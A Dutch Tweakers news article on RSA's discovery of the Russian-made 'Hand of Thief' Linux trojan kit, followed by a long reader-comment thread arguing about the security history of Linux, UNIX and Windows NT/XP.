Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Je kunt ook een cookievrije versie van de website bezoeken met minder functionaliteit. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , reacties: 217, views: 38.980 •
Submitter: ieperlingetje

Beveiligingsonderzoekers van RSA hebben een nieuwe malwarekit van Russische makelij aangetroffen die zich specifiek richt op Linux-systemen. Via de zogeheten Hand of Thief-trojan kan onder andere inlogdata worden buitgemaakt.

De trojan is volgens de makers getest op vijftien verschillende Linux-distributies, waaronder Debian, Fedora en Ubuntu. Ook zou de malware overweg kunnen met diverse desktopomgevingen, zoals KDE en Gnome, en populaire browsers, zoals Firefox en Chromium. Via de Hand of Thief-software zou binnen de browser data uit formulieren gekopieerd kunnen worden. Daarnaast worden er backdoors op een besmet systeem aangemaakt, terwijl een blocklist moet voorkomen dat de malware wordt gevonden en verwijderd.

De malwaremakers, vrijwel zeker actief in Rusland, leveren voor de gebruikers van hun malwarekit een admininterface. Daarmee kan gestolen data worden opgevraagd en cookies worden buitgemaakt. Ook geeft het adminpanel een overzicht van alle systemen die zijn besmet met de Hand of Thief-trojan.

Goedkoop is de malwarekit niet, zo schrijft RSA. In ondergrondse hackersfora zou 3000 dollar worden gevraagd voor het malwarepakket, terwijl voor elke belangrijke upgrade 550 dollar moet worden neergelegd. Bovendien is het opmerkelijk dat de cybercriminelen zich richten op Linux-systemen: niet alleen is het aantal te treffen systemen veel kleiner dan op Windows draaiende computers, ook wordt de Linux-softwarearchitectuur door de meeste beveiligingsonderzoekers als veiliger gezien en worden beveiligingsgaten door het opensourcekarakter van Linux veelal snel gepatcht. Welke exploit Hand of Thief gebruikt, is nog niet duidelijk.

Adminpanel van Hand of Thief

Reacties (217)

Reactiefilter:-12170193+1113+213+32
Wat wel belangrijk is om te melden dat de gebruiker zelf toestemming moet geven om deze malware te installeren. Met andere woorden, zolang je je beperkt tot de ingebouwde "winkel" in je linux distributie zal je niet zo snel gevaar lopen.

Als je zelf tarball of iets dergelijks gaat zoeken en installeren zul je meer gevaar lopen. Let dus gewoon goed op waar je je software vandaan haalt en dan loopt het over het algemeen wel los.
Eigenlijk precies hetzelfde als met Windows dus. Gewoon goed opletten wat je download en installeert. En uiteraard je beveiligingsupdates goed in de gaten houden.
Of goede beveileginssystemen hebbn
De gebruiker zijn kennis is de beste beveiliging.
Nee hoor, er bestaan lekken die gewoon uitgevoerd worden waarbij je helemaal niks hoeft te installeren.
Op windows zeker en vast. Op Linux zou ik zo nog niet weten. En als er iets op deze aard ontdekt wordt, maken ze zeer snel een patch klaar bij de open source community.

Ja, je bent misschien kwetsbaar voor zero-day exploits, maar daar zal de beste virusscanner ook niet bij kunnen helpen.

Het kan in ieder geval geen kwaad om wekelijks een scheduled scan te doen op virussen op Linux systemen, indien je geen performance loss wilt van real-time scanning. Het kan altijd eens mislopen.
Menige Windows virusscanner kan tegenwoordig zero-day exploits herkennen aan de code die uitgevoerd wordt.
De Windows virusscanners hebben hierin juist een hoop ervaring.

Een groot nadeel van Linux is hierin juist, dat er bijna nooit een virusscanner op draait(, mede omdat het vaak niet nodig is). Detecteren van virusscan maakt dit juist weer lastiger.

En een patch klaar hebben, betekend niet dat iedereen hem snel geïnstalleerd heeft. Dit kan bij een groot bedrijf gerust een paar weken duren.
Als ze al instaleren, eerst moet het risico worden gecontroleerd, een virus wat bedrijfsbestanden jat is natuurlijk wat erger dan iets wat de startpagina verandert.
Dan moet er een testmachine opgezet worden die een tijdje draait om te controleren of de bedrijfsapplicaties nog werken en dan kan er worden gekeken of en hoe de patch zal worden doorgevoerd.
Over een netwerk ongeveer 400 clients Ghosten is een kleinschalig project, als een ghostserver crasht raak je zo een complete afdeling kwijt.
Vaak is het kwa kosten veel voordeliger om niet te sleutelen aan een werkend systeem dan risico te lopen op grotere problemen.
in het geval dat die kennis aanwezig is natuurlijk, anders kan het ook de zwakste schakel zijn... waar het gros van de malwares dus echt wel vanuit gaan.
ja, ben benieuwd wat SELINUX hiermee doet.
Ja die moet je nooit uitzetten..

Als die aan staat kan een proces niet zomaar bestanden schrijven naar bepaakde directories of systeem config files wijzigen. Ook het lezen vanuit bepaalde mappen die als zodanig staan aangemerkt wordt beperkt door SELINUX. Ik weet niet of de bekende browsers hun cookie map etc als zodanig aanmerken.

Nadeel is wel.. je kan met root access SELINUX tijdelijk of geheel uitschakelen. Als je dus zelf een tarball download en installeert (waar je root access voor nodig hebt) dan kan de eerste stap zijn om SELINUX de nek om te draaien.... :|
Niet helemaal, naast userrights, is het gebruikelijker in de OSS community te werken met MD5 checksums. Daarnaast denk ik dat de gemiddelde linux gebruiker meer knowhow heeft dan de gemiddel windows gebruiker.
Maar een gemiddelde linux gebruiker zal zich mischien ook veiliger wanen...
Niet helemaal, naast userrights, is het gebruikelijker in de OSS community te werken met MD5 checksums.
Tja, die user rights zijn inmiddels in Windows ook wel gemeengoed hoor. Al vanaf Windows Vista eigenlijk worden voor nieuwe gebruikers geen standaard admin accounts meer aangemaakt. En wat je zegt over Open Source software is wel waar, maar dit geldt voor alle operating systemen en niet alleen voor Linux. Bovendien moet de gebruiker die checksum ook nog maar controleren.

Overigens mag ik hopen dat ze inmiddels zijn overgestapt op iets anders dan MD5, want die is al een paar jaar compromised:
MD5 was designed by Ron Rivest in 1991 [..] However, it has since been shown that MD5 is not collision resistant; [..] In 2004, more serious flaws were discovered in MD5, making further use of the algorithm for security purposes questionable—specifically, a group of researchers described how to create a pair of files that share the same MD5 checksum. Further advances were made in breaking MD5 in 2005, 2006, and 2007. In December 2008, a group of researchers used this technique to fake SSL certificate validity, and CMU Software Engineering Institute now says that MD5 "should be considered cryptographically broken and unsuitable for further use"
bron: Wikipedia
Ten eerste in checksums controleren natuurlijk iets wat de packet-manager zelf doet, en niet de gebruiker,
Ten tweede hebben alle hedendaagse packet managers ook SHA-256 in combinatie met MD5.
Niet helemaal, naast userrights, is het gebruikelijker in de OSS community te werken met MD5 checksums. Daarnaast denk ik dat de gemiddelde linux gebruiker meer knowhow heeft dan de gemiddel windows gebruiker.
Zou je denken ?

Ik lees toch regelmatig "ik heb het bij mijn moeder/familie geinstalleerd, en nu is alles in orde"

Die personen zijn nu het doelwit, niet persé de diehard *nix gebruiker
En je cache geheugen regelmatig leegmaken zoals met CCleaner.
Voor een exploit hoef je toch geen toestemming te geven?
Dat klopt volgens mij niet helemaal in het verhaal. Eerst wordt er een trojan genoemd, dus een evil stukje code die met een bestand mee naar binnen komt en als ik het goed begrijp die malwarekit binnenhaalt. Als dat gebeurd is heb je toch geen exploit meer nodig? En een Linux user-->root exploit klinkt sowieso ongeloofwaardig, dat is zelfs voor van binnenuit heel erg zeldzaam.
Eigenlijk wordt er onterecht verband gelegd tussen die malwarekit en die trojan. Het lijkt op FUD uit de non-Linux-hoek, wat uiterst effectief blijkt gezien alle links erheen op internet en waar die gasten met hun 3000 dollar nu waarschijnlijk heel veel aan verdienen.

[Reactie gewijzigd door blorf op 11 augustus 2013 17:22]

Als een malware pakket door middel van trojan word meegeïnstalleerd wil het niet zeggen dat er geen versies zijn die worden geïnstalleerd d.m.v een exploit.
Voor het stelen van informatie uit webformulieren is root bijv. niet nodig. Enkel indien de trojan admin taken moet uitvoeren om zichzelf te maskeren zullen root rechten nodig zijn, maar deze malware zou zijn basis opdracht perfect kunnen afwerken zonder.
Ok, er kan een hoop bij het useraccount een desktop-gebruiker. Ik heb een keer een account vol met IRC-bot-scripts gehad vanwege gebruiker Michael die zijn wachtwoord in leahcim had veranderd. De gebruikers moeten wel een klein beetje wakker blijven. :+
Nee, u moet beter leeswerk doen denk ik: Er worden een aantal hosts geblokkeerd voor veiligheidsupdates. Hosts blokkeren is in Linux niet iets wat je als non-root makkelijk kan doen, en anders hoor ik graag hoe.

Ook een backdoor sock-proxy installeren en socket-connecties openen is volgens mij niet iets wat een gebruiker doorgaans kan, en anders ben ik ook erg geinteresseerd hoe.
Als de backdoor geen rechten nodig heeft die de gebruiker niet heeft dan is het puur openen van een sock-proxy/socket-verbindingen op de hoge poorten natuurlijk geen probleem, en de backdoor zal dan alleen draaien als de gebruiker aangemeld is.
(Ik ben vrijwel elke dag server/client software aan het debuggen/programmeren die als mij draait en die ik best kan instellen om automatisch op te starten zonder root rechten, denk aan bash/csh/zsh/etc-rc, gnome/kde/xfce/etc startup programs)

Om al het verkeer om te leiden, of zelfs het verkeer van andere gebruikers moet je inderdaad of root rechten hebben, of moet de andere gebruiker via social engineering worden misleid of de andere gebruiker moet wel heel erg verkeerde toestemmingen hebben op zijn bestanden waardoor het script een opstart functie kan aanmaken.

Wat betreft architectuur (hier boven/onder?):
Linux/Unix is van het begin af aan gebouwd met meerdere gebruikers en netwerk (remote) toegang in gedachten, dat brengt automatisch met zich mee dat veel veiligheid dingen er als vanzelfsprekend in zitten.
Uiteraard kunnen er ook fouten in zitten, maar uiteindelijk is het oplossen van die fouten vaak ook simpeler omdat het geen gedrag is waar iemand op rekent.

Windows werd in eerste instantie gebouwd als desktop OS zonder netwerk toegang of multi-user echt mee te nemen, in de NT-lijn is dat minder zo (en daarmee alle windows markt segmenten sinds XP), maar uiteindelijk is veel van de beveiliging in windows dingen die achteraf zijn toegevoegd en die dus niet echt in de architectuur en "hoe-het-werkt" van het systeem zitten.
Dat wil niet zeggen dat een deel van de veranderingen niet heel goede effecten heeft.
Windows bevat uiteindelijk ook enorm veel work-arounds voor "backwards compatibility" waarbij sommigen tegenwoordig zijn verplaatst naar een soort VM (XP-mode), maar al die dingen voegen natuurlijk niet toe aan veiligheid.
Windows werd in eerste instantie gebouwd als desktop OS zonder netwerk toegang of multi-user echt mee te nemen, in de NT-lijn is dat minder zo (en daarmee alle windows markt segmenten sinds XP), maar uiteindelijk is veel van de beveiliging in windows dingen die achteraf zijn toegevoegd en die dus niet echt in de architectuur en "hoe-het-werkt" van het systeem zitten.
Dat hoor je vaak, en dat is de grootste onzin die er is.
Windows NT is van de grond af aan opnieuw ontworpen, en introduceerde de 32-bit Windows API (Win32API), waar vanaf dag 1 al vrijwel alle security-features in zaten die we nog steeds gebruiken. Multi-user, ACLs etc (heel veel Win32API functies krijgen dan ook een SECURITY_ATTRIBUTES-argument mee, dit heeft linux tot op de dag van vandaag niet).

De oudere Win16API staat hier compleet los van (en draaide binnen NT altijd binnen een gevirtualiseerde omgeving). De eerste 32-bit consumenten-Windows, Windows 95, werd gebaseerd op de al bestaande Win32API van de NT-reeks, waarbij alleen de multi-user en security features niet geimplementeerd werden. Maar in NT zaten die er altijd dus al WEL in.
Dit is heel makkelijk na te gaan: pak gewoon de API reference van een oude Visual Studio erbij, en je ziet dat vrijwel alles ook op NT 3.x en 4 er al in zat.
Mensen die dit roepen, hebben dan ook geen flauw benul van OSen en APIs. Ik snap dan ook niet waarom ze uberhaupt iets willen roepen daarover.

Natuurlijk zijn er door de jaren nog wel dingen bijgekomen danwel verbeterd of uitgebreid, maar dit geldt voor elk OS dat in ontwikkeling is, ook een linux of een OS X (neem bv Address Space Layout Randomization, dat is pas eind jaren 90 ontwikkeld, dus geen enkel OS had dat begin jaren 90).

[Reactie gewijzigd door Scalibq op 11 augustus 2013 23:41]

De NT-lijn is inderdaad vanaf ontwerp goed opgezet als multiuser systeem, echter met de komst van XP heeft MS dit ontwerp flink gesloopt voor gebruikersvriendelijkheid!

Hierdoor is een hoop van de beveiliging die oa in 2000 wel zat teniet gedaan.
Hoe kom je daar bij? In XP zit gewoon alles wat in 2000 zat, en nog meer (vooral in sp2 kwamen er flink wat nieuwe beveiligingsfeatures bij).
Je roept onzin.

[Reactie gewijzigd door Scalibq op 12 augustus 2013 11:10]

Mogelijkheden : ja
Default configuratie en daardoor gebruikbaar in de praktijk : nee
Mogelijkheden : ja
Default configuratie en daardoor gebruikbaar in de praktijk : nee
Da's heel wat anders.
Bovendien is dat niet waar.
De NT-lijn was oorspronkelijk bedoeld voor gebruik in zakelijke netwerken, waar het netwerk dus professioneel beheerd werd.
Die professionele systeembeheerders wisten prima hoe ze hun netwerk moisten configureren, en dus werd dat al JAREN in de praktijk gebruikt.
Met XP veranderde er dan ook niets voor de zakelijke gebruiker, want de professional versie het kon op dezelfde manier beheerd worden als de eerdere NTs.

Voor thuisgebruikers veranderde er eigenlijk ook weinig. De 9x-lijn had geen beveiliging of multi-user support. Dus voor thuisgebruikers die niet wisten hoe ze deze features konden gebruiken, veranderde er weinig met XP. Voor de mensen die dat WEL wisten, veranderde er wel wat, want nu hadden ze de volledige NT-features.

Kortom, je roept onzin.
Scalibq heb je ooit eens als thuisgebruiker XP proberen te gebruiken als non-admin?

Ik vaak genoeg en 3/4 van je software werkte dan niet of niet goed. Natuurlijk lag dit aan die software, maar de software makers hadden deze mogelijkheid nooit mogen krijgen.

Tevens waren er genoeg instellingen aan het OS zelf dat onterecht beheerdersrechten vroegen zoals de klok weergave (weergave niet de tijd!). Het was te doen ja, maar goed werkbaar absoluut niet.

Vanuit de installer had windows al vanaf begin moeten afdwingen dat er een gebruikersaccount en een beheerders account was. Elk nieuw account dat je maakte was default admin.

Nog steeds zit deze splitsing er in de installer NIET in. Ja de rechten worden door UAC omlaag gedrukt, maar als daar een bug in zit is de gebruiker full admin.
In tegenstelling tot onder Linux waar je hooguit een gebruiker bent die ook sudo mag doen. Niks default beheerdersrechten. Altijd je wachtwoord vereist als je systeem wijzigingen aan brengt.

Lul niet over de theoretische mogelijkheden van de MS software. Het gaat om de praktijk situatie waarbij XP een veiligheidsramp was. Pas bij vista/7 is het wat verbeterd.
Ik draai al vele jaartjes mee in de IT-wereld en heb windows gekend vanaf 95 en ik vind windows vergeleken met OS X en Linux inconsistente troep.

[Reactie gewijzigd door hackerhater op 13 augustus 2013 11:07]

Scalibq heb je ooit eens als thuisgebruiker XP proberen te gebruiken als non-admin?
Wacht even, je beweerde dit:
"met de komst van XP heeft MS dit ontwerp flink gesloopt voor gebruikersvriendelijkheid!"

Dus hoe is dit een argument dat die eerdere stelling ondersteunt?
Blijkbaar klaag je nu dat XP niet gebruikersvriendelijk genoeg is. Maar XP was toch juist gebruikersvriendelijker gemaakt door een hoop eruit te slopen?

Hoe dan ook, NT-versies van voor XP werkten echt niet beter als non-admin, daar is niets aan veranderd.
Ik vaak genoeg en 3/4 van je software werkte dan niet of niet goed. Natuurlijk lag dit aan die software, maar de software makers hadden deze mogelijkheid nooit mogen krijgen.
Dat is makkelijk praten. Je moet wel rekening houden met het feit dat het verleden van Windows en DOS ligt bij microcomputers, en Linux/UNIX bij minicomputers en groter spul.

In de tijd van DOS *had* een microcomputer gewoon geen mogelijkheid tot enigerlei beveiliging van geheugen of wat dan ook. Dat zat gewoon niet in de CPU ingebouwd.
Multiuser was ook geen optie. En bovendien vrij nutteloos: netwerken had je niet, en je was al blij als je 1 applicatie tegelijk kon draaien. Het heette dan ook niet voor niets een Personal Computer: 1 computer per persoon.

Dit is geen tekortkoming van het OS, maar gewoon een 'sign of the times'. Ook Mac, Atari ST, Amiga, Archimedes en andere microcomputers uit die tijd hadden dezelfde beperkingen.
Mensen die reopen dat softwaremakers die mogelijkheid nooit hadden moeten krijgen, hebben totaal geen historisch besef, snappen absoluut niets van de technische beperkingen.

Het grootste probleem waar Windows NT mee te maken heeft gehad, is dat veel DOS/Windows-ontwikkelaars dus niet zijn opgegroeid met dergelijke rechtensystemen, en daardoor veel te lang hun software daar niet netjes op hebben aangepast.
Dit kun je Microsoft niet aanrekenen, die hebben sinds de eerste versie van Windows NT in 1993 de mogelijkheden aangereikt aan de ontwikkelaars, en ook goede guidelines en recommendations geschreven over hoe dit te gebruiken.

Zo schreef Microsoft al JAREN voor om GEEN data in Program Files op te slaan, maar hiervoor de Documents and Settings folder te gebruiken.
Maarja, als ontwikkelaars dat toch stug blijven doen...
Vanuit de installer had windows al vanaf begin moeten afdwingen dat er een gebruikersaccount en een beheerders account was. Elk nieuw account dat je maakte was default admin
Waarom? Ik kan ook wel wat oude Linux of FreeBSD-distributies uit de kast trekken, die dat OOK niet deden. Vroeger ging men er gewoon vanuit dat dergelijke OSen alleen door professionals geinstalleerd en geconfigureerd werden, en die wel wisten hoe dat moest.
Een beperkte user-account standaard installeren is iets van de laatste jaren. Hindsight is always 20/20.
maar als daar een bug in zit is de gebruiker full admin.
Ja, zo lust ik er ook nog wel een paar. Als er een bug zit in de login prompt van linux, dan logt ie ook als root in, terwijl ik een normale gebruikersnaam intyp!
In tegenstelling tot onder Linux waar je hooguit een gebruiker bent die ook sudo mag doen. Niks default beheerdersrechten
Nu wel ja, vroeger niet.
Ik draai al vele jaartjes mee in de IT-wereld en heb windows gekend vanaf 95 en ik vind windows vergeleken met OS X en Linux inconsistente troep.
Mag ik even lachen? Windows 95...
Je hebt geen idee wat je allemaal gemist hebt he?
Ik heb nog op 8-bit systemen gewerkt, en met vroege versies van MS-DOS, de eerste versies van Windows... Toen NT3.51 en OS/2, werelden van verschil.
Ik heb ook oa vroege linux-distributies gebruikt, en FreeBSD.
Toen nog gewoon een hele bak daemons gratis en voor niets mee werd geinstalleerd, en vol open, inclusief nachtmerries als telnet, fingerd, rpc en noem maar op. Firewalls? Wat zijn dat?

Tegen 1995/1996 was alles al redelijk volwassen aan het worden. We hadden Pentiums, 32-bit protected mode, je kon gewoon 16(!) MB in een computer steken, en een Windows NT of een UNIX-achtige op een standard PC draaien! Wow! Wat een luxe!
Best grappig dat broekies als jij denken dat dat altijd al kon.

Als ik jou was, zou ik eens een linux-distro anno 1995 installeren. Er gaat vast een wereld voor je open. Zul je zien dat ook linux van ver heeft moeten komen qua security (om nog maar te zwijgen van gebruiksgemak).

[Reactie gewijzigd door Scalibq op 13 augustus 2013 22:24]

Linux heeft op Mini's gedraaid?

Ook stond onder de oudere distributies alles open onder Linux?

Bij de ene uitspraak schaar je Linux met UNIX samen. UNIX heeft wel op een Mini gedraaid. Bij je tweede uitspraak schaar je FreeBSD en Linux samen en claim je dat bij beiden alles open stond.

Ik kan me toch iets voor de geest halen van login.defs aanpassen, zodat je als root mocht telnetten. Anders ging dat niet.

Bij Linux was security juist het vertrekpunt en aan gebruikersgemak moest ernstig gewerkt worden in de beginjaren. Zeker de Athena widgets wat een lelijke ondingen waren dat.

[Reactie gewijzigd door Elite25 op 14 augustus 2013 03:03]

Linux heeft op Mini's gedraaid?
UNIX natuurlijk, gaan we weer kinderachtig doen?
Ook stond onder de oudere distributies alles open onder Linux?
Dat is correct.
Bij de ene uitspraak schaar je Linux met UNIX samen. UNIX heeft wel op een Mini gedraaid.
Wat is daar mis mee? Linux is een UNIX-kloon, en maakt dus gebruik van het UNIX-ontwerp qua multitasking, multiiuser, memory protection en dergelijke, en heeft daarom ook minimaal een 386 nodig, en een paar MB geheugen (evenals Windows NT). Dat is hardware die nog niet eens bestond in de begintijd van DOS en Windows, dat is mijn punt. Daar had je een minicomputer voor nodig, hele andere tak van sport.

Je kunt dus niet gaan roepen dat "dit-en-dat er altijd al in had moeten zitten" als het fysiek niet mogelijk was op de hardware die destijds te koop was. Dan heb je het duidelijk niet begrepen.
Bij je tweede uitspraak schaar je FreeBSD en Linux samen en claim je dat bij beiden alles open stond.
Wederom correct.
Bij Linux was security juist het vertrekpunt
Dat is niet correct. Het oorspronkelijke doel van de linux-kernel was slechts om een volwaardige UNIX-achtige kernel te maken op basis van de 386-architectuur voor PCs (in eerste instantie als vervanging voor de 8086-kernel van MINIX, maar al vrij snel werd linux gekoppeld met het GNU-project).
Het oorspronkelijke doel van vroege linux distributies was dan ook slechts om een werkende UNIX-achtige omgeving aan te leveren voor 386-PCs.
Voor 386BSD/FreeBSD geldt hetzelfde.

Pas jaren later, toen de distributies volwassener werden, en ook meer gebruikt gingen worden door mensen met weinig of geen UNIX-ervaring, is men ook in gaan zetten op gebruikersvriendelijkheid, en een deel daarvan was dus om ook default al relatief veilige installaties te hebben.
Voor ervaren gebruikers is een default-installatie natuurlijk niet relevant. Die passen de configuratie toch wel aan aan hun eigen omgeving. Geen enkele default voldoet precies aan hun wensen en eisen.

Zoals ik al zei, pak eens een vroege linux distributie erbij, of desnoods een FreeBSD. Je zult zien dat een default install TOTAAL niet secure is. Dat is niet te vergelijken met hoe het vandaag de dag is.
In die dagen ging men ervanuit dat iemand zelf wel wist hoe ie daemons aan of uit kon zetten, een firewall installen, user accounts aanmaken etc.
Ik heb zelf ervaring met verschillende linux distributies vanaf ongeveer 1996, en toen was dat dus nog het geval. Ergens rond 1999 ben ik overgestapt naar FreeBSD, en ook daar waren default installs destijds nog totaal niet secure.
Ook de HP-UX studentenserver die we destijds op de universiteit hadden, was niet secure volgens hedendaagse maatstaven (en die werd toch professioneel beheerd). Die had gewoon nog dingen als telnetd en fingerd draaien. SSH, wat is dat? Dat bestond toen nog niet eens. Men vond blijkbaar dat telnet sessies met cleartext veilig genoeg waren?

Mensen die denken dat UNIX altijd ultrasecure was, roepen maar wat. Eigenlijk is het omgekeerde het geval: UNIX was het belangrijkste OS bij de ontwikkeling van het internet, en veel exploits, hacks, worms etc zijn ook het eerst op UNIX ontwikkeld. Men is daar ook met schade en schande wijs geworden.
Een ander leuk voorbeeld is firewalls. Die zijn pas eind jaren 80 uitgevonden. Maar het Internet Protocol bestond al sinds 1974. Daar zitten dus een behoorlijk aantal zwakheden in die makkelijk geexploit konden worden (dingen als portscannen, SYN_FLOOD en noem maar op). Pas veel later kwamen er dus firewalls om die gaten in het protocol een beetje te dichten. Nee, UNIX is zeker niet altijd ultrasecure geweest.
Dingen als sendmail en BIND hebben een lange reputatie als grote bron van exploits.
Staat ook zelfs letterlijk in de wiki van Sendmail:
Sendmail originated in the early days of the Internet, an era when considerations of security did not play a primary role in the development of network software. Early versions of Sendmail suffered from a number of security vulnerabilities that have been corrected over the years.

[Reactie gewijzigd door Scalibq op 14 augustus 2013 14:51]

Je geeft gewoon toe dat je geschiedvervalsing aan het plegen bent.
Dat is makkelijk praten. Je moet wel rekening houden met het feit dat het verleden van Windows en DOS ligt bij microcomputers, en Linux/UNIX bij minicomputers en groter spul.
Dus Linux draaide op Mini's?

En wat heb je in hemelsnaam met dingen kinderlijk te vinden? Ben je een kind ofzo? Je profiel geeft weinig informatie en het is een nieuw account.

En sendmail staat synoniem voor het hele UNIX systeem?

Daarnaast is UNIX geen Linux. Daar zit nogal verschil in. Vraag de SCO Group maar.

[Reactie gewijzigd door Elite25 op 14 augustus 2013 23:29]

Je geeft gewoon toe dat je geschiedvervalsing aan het plegen bent.
Nee, jij bent gewoon keihard aan het zoeken naar alles waar je ook maar enigszins uit z'n verband kunt rukken. En dan kom je uit op totaal irrelevante dingen zoals dit. Dat komt gewoon heel kinderachtig over.

Zo voer je geen discussie.
Ga liever in op technische dingen, of geef gewoon je ongelijk toe als een volwassen iemand.
Dus linux draaide op Mini's?
Nee, de voorlopers van Linux draaiden op mini's. Had ik al gezegd.
Dat is verder niet relevant, het punt waar het om gaat is dat je voor linux minimal een 386-CPU nodig hebt, omdat eerdere x86-CPUs geen memory protection ondersteunden, en ook multitasking was vrij lastig zonder de nieuwe 386-features (dingen die standaard zijn in de meeste UNIX-varianten, die dus op meer high-end hardware gericht zijn).
Daarom is linux ook pas begin jaren 90 ontwikkeld. Toen werden 386/486-systemen pas betaalbaar voor de gewone man.

DOS en Windows (de voorlopers van Windows NT) draaiden op systemen van begin jaren 80, dat is een wereld van verschil. Snap je dat eigenlijk wel? Ik krijg de indruk dat je totaal het punt mist, omdat je eigenlijk geen idee hebt van wat een CPU al dan niet doet in samenwerking met het OS.
En sendmail staat synoniem voor het hele UNIX systeem?
Dat zeg ik niet, maar de filosofie (om dat woord maar weer eens aan te halen) van UNIX in het algemeen is wel die waarmee ook sendmail destijds ontwikkeld is. Men was toen nog niet zo met security bezig.
Ik heb ook andere voorbeelden genoemd, zoals telnet, en het ontbreken van firewalls tot eind jaren 80.
Of wou je zeggen dat het gebruik van cleartext protocols een bewijs is van goede security?
Daarnaast is UNIX geen Linux. Daar zit nogal verschil in. Vraag de SCO Group maar.
In deze context (security) zijn de overeenkomsten veel belangrijker dan de verschillen.

SSH is pas in 1995 ontwikkeld. Linux distributies waren er toen al een tijdje. En die hadden dus ook geen SSH, net als andere UNIX-achtigen. Je gebruikte gewoon telnet, rlogin of iets anders onveiligs met cleartext protocol.

Dan kun je wel heel hard gaan roepen dat UNIX geen linux is of wat dan ook, maar dat verandert niets aan het feit dat linux distributies gewoon standaard daemons met cleartext protocols installeerden. En gegeven dat feit is het dus onmogelijk om vol te houden dat linux altijd al om security draaide.

[Reactie gewijzigd door Scalibq op 14 augustus 2013 21:57]

Je zit het chronologisch wel een beetje uit zijn verband te rukken.

In welke jaren kwamen die UNIX versies op de Mini's uit?

En tuurlijk zaten daar kinderziektjes in het begin in.

Wat UNIX geintjes uit die tijd:
SNMP = Security is Not My Problem
NFS = Nightmare File System

En hoe groot was het internet in Nederland voor 1 mei 1993?

Wie liep er tussen 1993 en 1995 lekker te netwerk sniffen om zo iedereen zijn clear text password te kunnen zien?

Linux werd inderdaad op een 386 ontwikkeld en er is ooit een 16 bit Linux project geweest, maar dat is niet echt van de grond gekomen. (niet zo gek omdat daar gewoon nauwelijks behoefte voor is)

Linux ondersteunde vanaf het begin geheugen segmentering. Iets waar je onder Windows tot XP heb moeten wachten. Het geheugen netjes gescheiden houden, heeft ook met beveiliging te maken. Pijlen zijn binnen Linux altijd op SUID programma's gericht geweest, aangezien je met een buffer overflow exploit een shell kon starten met verhoogde rechten.

De DOS en Windows zijn niet echt de voorlopers van NT trouwens. DOS werd gekocht. NT werd van scratch geschreven door het VMS team dat Microsoft bij Digital Equipment had weggekaapt.

Hierdoor kon je niet veel met de vroege versies van NT. Beetje filesharen, terwijl Novell servers qua performance rondjes konden rennen om die dingen.

[Reactie gewijzigd door Elite25 op 15 augustus 2013 23:30]

En hoe groot was het internet in Nederland voor 1 mei 1993?
Dat heeft er weinig mee te maken.
Wie liep er tussen 1993 en 1995 lekker te netwerk sniffen om zo iedereen zijn clear text password te kunnen zien?
Was een populaire bezigheid op de LANs bij universiteiten bv. Zo konden studenten makkelijk accounts van andere studenten hacken, of met een beetje geluk het root-password opvangen.
In zakelijke omgevingen was dat natuurlijk ook erg gevaarlijk. Het was voor kwaadwillenden niet zo heel lastig om het network af te luisteren, root access te krijgen, en bij gevoelige informatie te kunnen.

Maar dat doet er allemaal niet toe?
Iets waar je onder Windows tot XP heb moeten wachten.
Okee, je weet er dus niks vanaf.
Windows NT is al vanaf de eerste versie in 1993 alleen op een 386 in protected mode te draaien, met volledig gescheiden adresruimtes.
XP is gewoon de zoveelste versie van NT.
Dat je dat niet weet is wel een teken dat je echt 0 kennis hebt van Windows.
DOS werd gekocht.
Wat heeft dat ermee te maken? Het is nog steeds de basis voor de eerste versies van Windows, of DOS nou oorspronkelijk van een ander bedrijf overgenomen is of niet.
NT werd van scratch geschreven door het VMS team dat Microsoft bij Digital Equipment had weggekaapt.
Ja, en dus? Het is nog steeds de opvolger van Windows, aangezien het Windows NT heet, en ook backwards compatible is met de eerdere versies van Windows.
Sinds Windows XP is de NT-versie ook de enige overgebleven Windows-variant (waarvan de 32-bit versie nog steeds backwards compatible is met de eerdere Windows-versies, en ook nog met DOS).

Linux is ook from scratch geschreven. Maar het is wel compatible met een groot deel van de UNIX-API, met name de POSIX-standaard (en dus ook source-code compatible). Dus is het een van de opvolgers van UNIX.
Maar dat doet er allemaal niet toe?
Je had het over de veiligheid van UNIX op het internet.
Je had het over de veiligheid van UNIX op het internet.
Ik had het over de veiligheid van UNIX-achtigen in het algemeen, en de beperking 'op het internet' heb ik nergens genoemd, dat heb je er helemaal zelf bij verzonnen.
De discussie ging over security in het algemeen, dus ook tussen verschillende users op hetzelfde systeem, en ook verschillende systemen op hetzelfde LAN, niet noodzakelijkerwijs aangesloten op het internet.

Dus dat jij dan komt met: "En hoe groot was het internet in Nederland voor 1 mei 1993?" is niet bepaald een sterk argument.
Dat maakt een OS er niet meer of minder veilig op. Hooguit de kans op een succesvolle aanval, maar dat heeft natuurlijk niets te maken met hoe secure een OS an sich ontworpen is.

Ik zal deze discussie maar als gewonnen beschouwen. Je pikt er weer een irrelevant dingetje uit, terwijl de rest van mijn post je complete betoog al voor de zoveelste keer onderuit gehaald had.

[Reactie gewijzigd door Scalibq op 15 augustus 2013 12:09]

Fantastisch ;)

Hier is een mooie schets van de situatie. http://roosterteeth.com/members/images/image.php?id=2331332

Maar afgezien van het grapje, maak ik een paar analytische observaties:

- je reageert op enkele regeltjes met hele lappen tekst vol met bijzaken.

- je quoteert compleet uit context

- je komt soms met rare ongegronde aannames over personen, die nergens op slaan.

- je raakt je eigen rode draad kwijt met jouw lappen tekst en als je geholpen wordt die weer op te pikken, bleek je het weer over iets anders te hebben.

- en de feiten trek je compleet uit hun chronologische verband.

Mijn voorbarige conclusie over autisme in mijn afgeraffelde post lijkt achteraf gezien niet zover van de waarheid te zitten.
En je hebt gelijk; je hebt gewonnen. In 'jouw' wereld win je altijd, toch?

[Reactie gewijzigd door Elite25 op 15 augustus 2013 23:26]

je komt soms met rare ongegronde aannames over personen, die nergens op slaan.
...
Mijn voorbarige conclusie over autisme
Uhuh...
Nee dat begrijp je verkeerd: De trojan wordt geinstaleerd. En die zend info naar buiten toe.

De mallware kit is er om de de mallware te maken. En de slachtoffers komen dus nooit direct in aanraking met de mallware kit. (met de mallware kit passen ze de trojan aan naar hun wensen en besturen ze hem als het ware)

De trojan maakt dus backdoors aan naar de buitenwereld.

Ik vraag me af hoe ze met een blocklist progjes als: http://www.rootkit.nl/projects/rootkit_hunter.html willen tegen gaan houden?

